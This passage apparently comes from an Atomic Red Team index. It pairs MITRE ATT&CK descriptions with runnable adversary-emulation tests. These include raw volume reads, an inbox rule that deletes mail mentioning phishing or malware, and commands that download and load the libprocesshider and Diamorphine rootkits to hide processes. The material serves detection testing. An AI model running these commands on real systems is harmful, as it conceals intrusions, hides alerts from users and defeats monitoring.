at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely
on the PATH environment variable to determine the locations that are searched
when the path for the program is not given, such as executing programs from
a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation:
ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify
the $PATH variable specifying the directories to be searched. An adversary
can modify the `$PATH` variable to point to a directory they have write access.
When a program using the $PATH variable is called, the OS searches the specified
directory and executes the malicious binary. On macOS, this can also be performed
through modifying the $HOME variable. These variables can be modified using
the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004),
or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC
linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic
Rules macOS launchctl 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5
created: '2017-05-31T21:30:20.934Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1006
external_id: T1006
- source_name: Github PowerSploit Ninjacopy
description: Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved
June 2, 2016.
url: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
- source_name: Hakobyan 2009
description: Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors
Directly from Disk using Logical Offsets. Retrieved November 12, 2014.
url: http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin
- source_name: LOLBAS Esentutl
description: LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Esentutl/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:23.015Z'
name: Direct Volume Access
description: |-
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tom Simpson, CrowdStrike Falcon OverWatch
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
- Windows
x_mitre_version: '2.3'
identifier: T1006
atomic_tests:
- name: Read volume boot sector via DOS device path (PowerShell)
auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
description: |-
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
```
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
supported_platforms:
- windows
input_arguments:
volume:
description: Drive letter of the volume to access
type: string
default: 'C:'
executor:
command: |
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
T1666:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
created: '2024-09-25T14:16:19.234Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1666
external_id: T1666
- source_name: AWS Organizations
description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
Retrieved September 25, 2024.
url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
- source_name: AWS RE:Inforce Threat Detection 2024
description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
techniques for proactive threat detection. Retrieved September 25, 2024.
url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: Microsoft Subscription Hijacking 2022
description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Azure Resources
description: Microsoft Azure. (2024, May 31). Organize your Azure resources
effectively. Retrieved September 25, 2024.
url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
- source_name: Microsoft Peach Sandstorm 2023
description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
password spray campaigns enable intelligence collection at high-value targets.
Retrieved September 18, 2023.
url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:49:45.874Z'
name: Modify Cloud Resource Hierarchy
description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
(IaaS) environments in order to evade defenses. \n\nIaaS environments often
group resources into a hierarchy, enabling improved resource management and
application of policies to relevant groups. Hierarchical structures differ
among cloud providers. For example, in AWS environments, multiple accounts
can be grouped under a single organization, while in Azure environments, multiple
subscriptions can be grouped under a single management group.(Citation: AWS
Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
delete, or otherwise modify resource groups within an IaaS hierarchy. For
example, in Azure environments, an adversary who has gained access to a Global
Administrator account may create new subscriptions in which to deploy resources.
They may also engage in subscription hijacking by transferring an existing
pay-as-you-go subscription from a victim tenant to an adversary-controlled
tenant. This will allow the adversary to use the victim’s compute resources
without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
API, causing the account to be severed from the AWS Organization to which
it was tied and removing any Service Control Policies, guardrails, or restrictions
imposed upon it by its former Organization. Alternatively, adversaries may
call the `CreateAccount` API in order to create a new account within an AWS
Organization. This account will use the same payment methods registered to
the payment account but may not be subject to existing detections or Service
Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '1.0'
atomic_tests: []
T1564.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff
created: '2021-06-07T13:20:23.767Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/008
external_id: T1564.008
- source_name: MacOS Email Rules
description: Apple. (n.d.). Use rules to manage emails you receive in Mail
on Mac. Retrieved June 14, 2021.
url: https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac
- source_name: Microsoft BEC Campaign
description: 'Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of
business email compromise: Using cross-domain threat data to disrupt a large
BEC campaign. Retrieved June 15, 2021.'
url: https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
- source_name: Microsoft Mail Flow Rules 2023
description: Microsoft. (2023, February 22). Mail flow rules (transport rules)
in Exchange Online. Retrieved March 13, 2023.
url: https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
- source_name: Microsoft Inbox Rules
description: Microsoft. (n.d.). Manage email messages by using rules. Retrieved
June 11, 2021.
url: https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
- source_name: Microsoft New-InboxRule
description: Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.
url: https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
- source_name: Microsoft Set-InboxRule
description: Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.
url: https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
- source_name: Microsoft Cloud App Security
description: Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft
Cloud App Security. Retrieved June 7, 2021.
url: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:23.364Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)
In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Dor Edry, Microsoft
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Office Suite
x_mitre_version: '1.4'
identifier: T1564.008
atomic_tests:
- name: New-Inbox Rule to Hide E-mail in M365
auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
description: |
This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
supported_platforms:
- office-365
input_arguments:
auth_username:
description: M365 Username
type: string
default: john@contoso.com
auth_password:
description: M365 Password
type: string
default: p4sswd
mail_rulename:
description: Name of the inbox rule.
type: string
default: default
target_mailbox:
description: Mailbox you are creating the rule in
type: string
default: jane@contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name ExchangeOnlineManagement
-ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name ExchangeOnlineManagement -Force
'
executor:
command: |
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
cleanup_command: |
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential
Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
name: powershell
elevation_required: false
T1027.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144
created: '2024-03-29T12:38:17.135Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/013
external_id: T1027.013
- source_name: File obfuscation
description: Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July
19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved
March 29, 2024.
url: https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
- source_name: SFX - Encrypted/Encoded File
description: Jai Minton. (2023, March 31). How Falcon OverWatch Investigates
Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads.
Retrieved March 29, 2024.
url: https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:05.840Z'
name: 'Obfuscated Files or Information: Encrypted/Encoded File'
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
encoding file content aims to conceal malicious artifacts within a file used
in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
[Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded
Payloads](https://attack.mitre.org/techniques/T1027/009), share this same
broad objective. Encrypting and/or encoding files could lead to a lapse in
detection of static signatures, only for this malicious content to be revealed
(i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140))
at the time of execution/use.\n\nThis type of file obfuscation can be applied
to many file artifacts present on victim hosts, such as malware log/configuration
and payload files.(Citation: File obfuscation) Files can be encrypted with
a hardcoded or user-supplied key, as well as otherwise obfuscated using standard
encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated,
or just specific functions or values (such as C2 addresses). Encryption and
encoding may also be applied in redundant layers for additional protection.\n\nFor
example, adversaries may abuse password-protected Word documents or self-extracting
(SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566)
payload. These files typically function by attaching the intended archived
content to a decompressor stub that is executed when the file is invoked (e.g.,
[User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX
- Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as
well as custom encoding schemes. For example, Byte Order Mark (BOM) headers
in text files may be abused to manipulate and obfuscate file content until
[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
execution."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Galazin @themalwareman1
- Andrew Northern, @ex_raritas
- Jai Minton, @Cyberraiju
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
identifier: T1027.013
atomic_tests:
- name: Decode Eicar File and Write to File
auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
description: Decode the eicar value, and write it to file, for AV/EDR to try
to catch.
supported_platforms:
- windows
- macos
- linux
executor:
command: |-
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
description: Decrypt the eicar value, and write it to file, for AV/EDR to try
to catch.
supported_platforms:
- windows
- macos
- linux
executor:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
T1014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b
created: '2017-05-31T21:30:26.496Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1014
external_id: T1014
- source_name: CrowdStrike Linux Rootkit
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: BlackHat Mac OSX Rootkit
description: 'Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit
uses the tricks you haven''t known yet. Retrieved December 21, 2017.'
url: http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf
- source_name: Symantec Windows Rootkits
description: Symantec. (n.d.). Windows Rootkit Overview. Retrieved December
21, 2017.
url: https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf
- source_name: Wikipedia Rootkit
description: Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.032Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
Rootkits are programs that hide the existence of malware by intercepting/hooking
and modifying operating system API calls that supply system information. (Citation:
Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality
may reside at the user or kernel level in the operating system or lower, to
include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001).
(Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux,
and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat
Mac OSX Rootkit)\n\nRootkits that reside or modify boot sectors are known
as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically
target the boot process of the operating system."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: string
default: T1014
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
'
prereq_command: 'if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0;
else exit 1; fi;
'
get_prereq_command: |
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
executor:
command: 'sudo insmod #{rootkit_path}/#{rootkit_name}.ko
'
cleanup_command: |
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
name: sh
elevation_required: true
- name: Loadable Kernel Module based Rootkit
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
description: Module name
type: string
default: T1014
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
'
prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
exit 0; else exit 1; fi;
'
get_prereq_command: "sudo apt install make\nsudo apt install gcc\nif [ ! -d
/tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;\ncp
#{rootkit_source_path}/* /tmp/T1014\ncd /tmp/T1014; make \nsudo cp
/tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/\n[ -f /tmp/T1014/safe_to_delete
] && rm -rf /tmp/T1014\nsudo depmod -a\n"
executor:
command: 'sudo modprobe #{rootkit_name}
'
cleanup_command: |
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
name: sh
elevation_required: true
- name: dynamic-linker based rootkit (libprocesshider)
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
specific process name via ld.so.preload (see also T1574.006).
'
supported_platforms:
- linux
input_arguments:
repo:
description: Url of the github repo zip
type: string
default: https://github.com/gianlucaborello/libprocesshider/
rev:
description: Revision of the github repo zip
type: string
default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_path:
description: Full path of the library to add to ld.so.preload
type: string
default: "/usr/local/lib/libprocesshider.so"
dependency_executor_name: bash
dependencies:
- description: 'The preload library must exist on disk at specified location
(#{library_path})
'
prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
'
get_prereq_command: |
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
executor:
command: |
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
cleanup_command: |
sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
name: sh
elevation_required: true
- name: Loadable Kernel Module based Rootkit (Diamorphine)
auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
description: 'Loads Diamorphine kernel module, which hides itself and a processes.
'
supported_platforms:
- linux
input_arguments:
repo:
description: Url of the diamorphine github repo
type: string
default: https://github.com/m0nad/Diamorphine/
rev:
description: Revision of the github repo zip
type: string
default: 898810523aa2033f582a4a5903ffe453334044f9
rootkit_name:
description: Module name
type: string
default: diamorphine
dependency_executor_name: bash
dependencies:
- description: 'The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
'
prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
exit 0; else exit 1; fi;
'
get_prereq_command: |
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a
executor:
command: |
sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
cleanup_command: |
kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
name: sh
elevation_required: true
T1036.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e
created: '2021-08-04T20:54:03.066Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/007
external_id: T1036.007
- source_name: SOCPrime DoubleExtension
description: 'Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible
Malicious File Double Extension. Retrieved July 27, 2021.'
url: https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/
- source_name: PCMag DoubleExtension
description: 'PCMag. (n.d.). Encyclopedia: double extension. Retrieved August
4, 2021.'
url: https://www.pcmag.com/encyclopedia/term/double-extension
- source_name: Seqrite DoubleExtension
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.732Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
file type extension that may cause only the first extension to be displayed
(ex: File.txt.exe may render in some views as just File.txt).
However, the second extension is the true file type that determines how the
file is opened and executed. The real file extension may be hidden by the
operating system in the file browser (ex: explorer.exe), as well as in any
software configured using or similar to the system’s policies.(Citation: PCMag
DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse
double extensions to attempt to conceal dangerous file types of payloads.
A very common usage involves tricking a user into opening what they think
is a benign file type but is actually executable code. Such files often pose
as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001)
into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)
then [User Execution](https://attack.mitre.org/techniques/T1204). For example,
an executable file attachment named Evil.txt.exe may display
